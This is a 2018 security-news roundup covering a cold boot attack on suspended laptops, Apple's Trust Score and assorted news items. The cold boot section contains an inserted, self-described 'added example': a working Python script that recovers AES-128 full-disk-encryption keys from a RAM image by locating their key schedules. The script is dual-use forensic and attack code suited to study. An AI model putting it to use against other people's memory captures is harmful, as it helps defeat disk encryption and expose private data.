
Security Bits – Cold Boot Attack, Apple’s Anti-Fraud Trust Score, EU Copyright Act Amendments

Security Bits – 21 Sep 2018

Followups

  • Following on from Apple’s belated removal of Adware Doctor for stealing users’ browser history, Apple have now booted three Trend Micro apps from the Mac App Store for doing the same thing, specifically Dr. Cleaner, Dr. Antivirus, and Dr. Archiver. Trend Micro insist it was an innocent mistake due to code re-use, and not malicious or nefarious in any way — tidbits.com/… & arstechnica.com/…
  • Following on from the two big recent UK hacks (Ticketmaster & British Airways), the same criminal gang have struck again, this time skimming card details from every credit card transaction on Newegg for about a month — www.macobserver.com/…

Security Medium 1 — A New Cold Boot Attack Against Almost All Laptops

Security researchers have discovered a new variant of the old so-called cold boot attack that affects most laptops. The attack exploits a flaw in how laptop firmware handles a reboot of a machine that is asleep. Or, to be more specific, a machine in the shallower of the two sleep states, i.e. one that is suspended, where the RAM stays powered and still holds everything the running OS had in memory. Devices in the deeper hibernation state, where memory is written out to disk and the RAM is powered off, are not vulnerable.

If an attacker can get physical access to a laptop that’s currently suspended, they can disable the firmware setting that tells the machine to scrub RAM on reboot, then force a reboot into a special OS of their devising booted from a USB stick. That OS uses almost no memory itself, so the data from the previously running OS survives in RAM, including the decryption key for full disk encryption. With that key the attacker can then decrypt the disk and help themselves to all the data on it.
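To make that last step concrete, here is an added example (my own code, not F-Secure’s tooling and not from this post) of how a cold boot attacker typically locates a full disk encryption key in a captured RAM image. The classic approach from the original cold boot research, used by tools such as aeskeyfind, slides a 16-byte window over the image and reports any window whose AES-128 key schedule appears in the 160 bytes immediately after it, because the OS keeps the expanded schedule next to the key for speed. The RAM image below is constructed for the example, with the FIPS-197 test key planted in it; the offsets, the 8 KiB size and the `max_errors` parameter are my choices, not anything from the advisory.

```python
"""Find AES-128 keys in a RAM image by searching for their expanded key
schedule (the technique from the original cold boot research, as used by
tools such as aeskeyfind). Added example, not code from the post."""
import random

SCHEDULE_LEN = 176  # AES-128: 11 round keys x 16 bytes


def rotl8(x, s):
    """Rotate an 8-bit value left by s bits."""
    return ((x << s) | (x >> (8 - s))) & 0xFF


def build_sbox():
    """Generate the AES S-box from GF(2^8) inverses plus the affine map,
    rather than hard-coding the 256-entry table."""
    sbox = [0] * 256
    p = q = 1
    while True:
        # p walks the field as successive powers of the generator 3 ...
        p = p ^ ((p << 1) & 0xFF) ^ (0x1B if p & 0x80 else 0)
        # ... while q tracks its multiplicative inverse (q = q / 3)
        q ^= (q << 1) & 0xFF
        q ^= (q << 2) & 0xFF
        q ^= (q << 4) & 0xFF
        if q & 0x80:
            q ^= 0x09
        x = q ^ rotl8(q, 1) ^ rotl8(q, 2) ^ rotl8(q, 3) ^ rotl8(q, 4)
        sbox[p] = x ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63  # zero has no inverse; the affine map of 0 is 0x63
    return sbox


SBOX = build_sbox()


def expand_key_128(key):
    """AES-128 key expansion (FIPS-197 5.2): 16-byte key -> 176-byte schedule."""
    words = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 0x01
    for i in range(4, 44):
        t = list(words[i - 1])
        if i % 4 == 0:
            t = t[1:] + t[:1]                 # RotWord
            t = [SBOX[b] for b in t]          # SubWord
            t[0] ^= rcon
            rcon = ((rcon << 1) ^ 0x11B) & 0xFF if rcon & 0x80 else rcon << 1
        words.append([a ^ b for a, b in zip(words[i - 4], t)])
    return bytes(b for w in words for b in w)


def find_aes128_keys(image, max_errors=0):
    """Report (offset, key) for every 16-byte window whose expanded schedule
    follows it in memory. max_errors tolerates that many mismatching schedule
    bytes (bit decay in a powered-off capture); 0 is right for the variant
    described above, where RAM never loses power."""
    hits = []
    for off in range(len(image) - SCHEDULE_LEN + 1):
        window = image[off:off + SCHEDULE_LEN]
        if max_errors == 0:
            # cheap filter: the first word of round key 1 must match
            # before we pay for a full expansion
            k = window[:16]
            t = [SBOX[b] for b in (k[13], k[14], k[15], k[12])]
            t[0] ^= 0x01
            if bytes(a ^ b for a, b in zip(k[:4], t)) != window[16:20]:
                continue
        errors = sum(a != b for a, b in zip(expand_key_128(window[:16]), window))
        if errors <= max_errors:
            hits.append((off, bytes(window[:16])))
    return hits


def build_sample_image(seed=1, corrupt=0):
    """Constructed RAM image: 8 KiB of pseudo-random filler with the FIPS-197
    test key's schedule planted at offset 1000 and a bare copy of the key
    (no schedule beside it) at offset 5000. corrupt > 0 flips that many
    schedule bytes to simulate bit decay."""
    rnd = random.Random(seed)
    image = bytearray(rnd.getrandbits(8) for _ in range(8192))
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")
    image[1000:1000 + SCHEDULE_LEN] = expand_key_128(key)
    image[5000:5016] = key
    for i in range(corrupt):
        image[1000 + 40 + 13 * i] ^= 0xFF
    return bytes(image), key


if __name__ == "__main__":
    img, key = build_sample_image()
    for off, k in find_aes128_keys(img):
        print(f"AES-128 key schedule at offset {off}: key {k.hex()}")
```

The bare key planted at offset 5000 is deliberately not reported: without the schedule next to it there is nothing to distinguish it from random data, which is exactly why searching for the schedule rather than for “random-looking” bytes works. Real tools go further and reconstruct keys whose own bytes have decayed from the redundancy in the schedule; this version only tolerates errors in the schedule bytes after the key.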

There are two obvious silver linings. Firstly, an attacker needs physical access to the targeted device while it is in the less deep of the two sleep modes, and they need that access for some time. Secondly, this is not like some previous FireWire-based attacks that could steal memory in seconds simply by plugging a dongle into a laptop for a few seconds and then removing it. You’re not going to be able to execute this attack while the victim turns their back for a few seconds to get something from a shelf!

The simplest way to protect yourself is not to let your laptop out of your sight while it’s suspended, or better still, to set it to hibernate or shut down rather than suspend when you close the lid, since the disk encryption key is only at risk while it sits in powered RAM. OS vendors are working on work-arounds, but that may not be so straightforward since the problem is with how the firmware implements the industry-standard memory-overwrite-on-reboot protection rather than with any one OS.

Links

Security Medium 2 — Apple’s Trust Score Anti-Fraud Feature

Apple updated its privacy statement for iOS 12 to inform users that it now calculates something it calls a device Trust Score to help battle fraud on its stores. This score is a single number that is calculated on-device, and then sent to Apple’s servers where it is kept for a limited amount of time.

Apple do not detail the exact algorithm they use to generate this score. There’s a very good reason for that: if they did, then bad guys could easily fake ‘good’ behaviour and utterly defeat the whole purpose of the feature. While they don’t tell us everything that goes into the algorithm, let alone how all that information gets translated into the final score, they do tell us that the data used includes information about calls and emails. Apple stress that all calculation is done on-device, and only the final numeric score is ever sent to Apple. Apple say that score cannot be reverse-engineered to reveal call or email information, and that it is only kept for a short time.

This seems eminently sensible to me, and it seems to me that Apple have done this the right way: do it on the device, and only upload the final answer to the cloud. I think it’s significant that Apple were completely up-front about this, and laid out what they are trying to achieve and what data they are using. We know about this because Apple told us, not because someone caught them doing something in secret, and I think that matters a lot in how I feel about it.

Links

Notable Security Updates

Notable News

  • 🇺🇸 It is now free to freeze and un-freeze your credit file in all states in the US — krebsonsecurity.com/…
  • 🇪🇺 The EU Parliament has approved a somewhat amended version of the controversial new EU-wide copyright act. At issue are articles 11 and 13, which require a so-called link tax and upload filters respectively — www.theverge.com/…
  • 🇺🇸 New US defence policies allow the US military to “defend forward” and launch pre-emptive cyber attacks. (Editorial by Bart: This is some impressive, in all the wrong ways, Orwellian newspeak!) — nakedsecurity.sophos.com/…
  • Security researchers are warning of a subtle URL-spoofing bug in Safari’s address bar, which can show one address while a page from somewhere else is still displayed. TL;DR: don’t enter any information into a page while the loading bar has not completed, or if there is no padlock — nakedsecurity.sophos.com/…
  • Unrelated to the above bug, another Safari bug has been found that allows some maliciously crafted HTML+CSS to crash iPhones & Macs — www.macobserver.com/…
  • Google has added a built-in password generator and manager to Chrome — nakedsecurity.sophos.com/…
  • Belgian security researchers have found a significant vulnerability in the key fobs for the Tesla Model S: the fob’s weak 40-bit cipher can be broken, allowing the fob to be cloned — nakedsecurity.sophos.com/…
  • 🇺🇸 Four major US cell carriers (AT&T, Verizon, T-Mobile & Sprint) have gotten together and announced their plans to build an online identity system which they are calling Project Verify. Users will be able to use Project Verify either as an alternative to passwords, or as a second factor, on sites that choose to implement the technology — krebsonsecurity.com/… & nakedsecurity.sophos.com/…
  • 🇺🇸 The CA state senate has passed a bill which makes a start at regulating the security of IoT devices. The bill is now awaiting the governor’s signature or veto — nakedsecurity.sophos.com/…
  • Owners of Western Digital My Cloud NAS drives beware: security researchers reveal that the company has failed to patch a serious vulnerability in these drives for over a year — nakedsecurity.sophos.com/…

Suggested Reading

2 thoughts on “Security Bits – Cold Boot Attack, Apple’s Anti-Fraud Trust Score, EU Copyright Act Amendments”

  1. Tim McCoy - September 24, 2018

    You never told that last joke/cartoon.

  2. Allison Sheridan - September 24, 2018

    Yeah – it wasn’t that funny…
